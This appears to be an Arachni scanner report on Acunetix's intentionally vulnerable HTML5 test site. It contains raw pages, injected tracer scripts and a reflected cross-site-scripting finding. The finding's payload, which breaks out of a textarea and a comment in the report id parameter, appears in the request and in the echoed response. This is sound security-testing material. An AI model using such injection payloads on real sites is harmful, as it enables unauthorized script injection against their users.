<br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> ssd.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> www.eff.org </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still 
just bad encryption <br><br> </div> </div> <hr> </div><div ng-repeat="item in items | filter:searchText" class="ng-scope"> <div ng-class="{archiveboxinteresting:item.value.users.length>1}"> <div class="row-fluid"> <div class="muted pull-left ng-binding"> twitter.com </div> <div class="muted pull-right"> <b class="ng-binding">1</b> tweets </div> </div> <a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <br> <!-- ngRepeat: user in item.value.users --><div ng-repeat="user in item.value.users" class="ng-scope ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> <hr> </div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>2</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 
2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); 
_arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script 
src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html>
This is the original HTTP response body.
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
link input id using GET at http://testhtml5.vulnweb.com/ pointing to http://testhtml5.vulnweb.com/report.
<a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"> <i class="icon-warning-sign" title="Report"> </i> </a>
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
| link | http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/report | | |
http://testhtml5.vulnweb.com/report?id=696a3680438a7af53a0a54d3d26469bf%3C/textarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7/%3E%3C!--%3Ctextarea%3E
Raw HTTP request used to retrieve the page.
GET /report?id=696a3680438a7af53a0a54d3d26469bf%3C%2Ftextarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7%2F%3E%3C%21--%3Ctextarea%3E HTTP/1.1
Host: testhtml5.vulnweb.com
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->
<link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Action</li>
<li class="active"><a href="#/response">Response</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
Your report was submitted, thanks. <!-- 696a3680438a7af53a0a54d3d26469bf</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea> -->
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p>© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<script src="/static/app/app.js"></script>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
